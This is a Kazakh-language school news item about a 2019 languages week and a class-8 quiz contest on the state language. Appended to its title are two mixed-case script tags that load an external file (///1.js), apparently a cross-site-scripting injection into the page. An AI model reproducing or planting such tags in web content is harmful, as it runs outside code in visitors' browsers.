Тіл мерейі-ел мерейі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.09.2019

    2019 жылдың 09-20 кыркүйек аралығында «Тілдер күні» қарсаңында Ғ.Әбдірахманұлы атындағы Қима орта мектебінде тілдер апталығы өткізіліп жатыр. Апталықтың  мақсаты:   Тіл заңының орындалуын қадағалау, еліміздің болашағы- жастардың мемлекеттік тілді кеңінен қол­да­нуын насихаттау, тіл – тату­лықтың, достықтың тетігі, тәр­биенің көзі, халықты бі­ріктірудің маңызды факторы екенін өскелең ұрпаққа ұғын­дыру. Оқушылардың тілге деген құрметін арттыру.      

 Қазақстан Республикасында тілді дамыту мен қолданудың 2011-2020 жылдарға арналған жаңа мемлекеттік бағдарламасын қарастыра отырып, ҚР халықтарының Тілдері күнін мерекелеуге арналған апталықты  іске асыру жөніндегі іс-шаралар жоспары құрылды.

Осы жоспарға сай 8 сыныпта «Тіл мерейі - ел мерейі» атты ашық тәрбие сағаты сайыс түрінде өткізілді. Мақсаты:  Оқушылардың дүниетанымдық көзқарастарын кеңейтіп, Отанға, туған халқына деген сүйіспеншілікті ояту. Елінің кең байтақ мекені мен ондағы құндылықтарды дәріптеуге тәрбиелеу. Оқушылардың сөйлеу қабілетін дамыту.

Жалпы сайыстың кезеңдері: «Бәйге», «Мәнерлеп оқу», «Мақал сөздің мәйегі», «Полиглот», «Даналық ойдан дән ізде».

Сынып оқушыларын «Тапқырлар» және «Алғырлар» екі топқа бөліп сайыс түрінде өткізілді. Сайыстың қорытындысы бойынша «Тапқырлар» тобы жеңіске жетті.

Сулеймэн Е.

Просмотров: 683


Пікір қосу



Деректерді қолтаңбаға қосу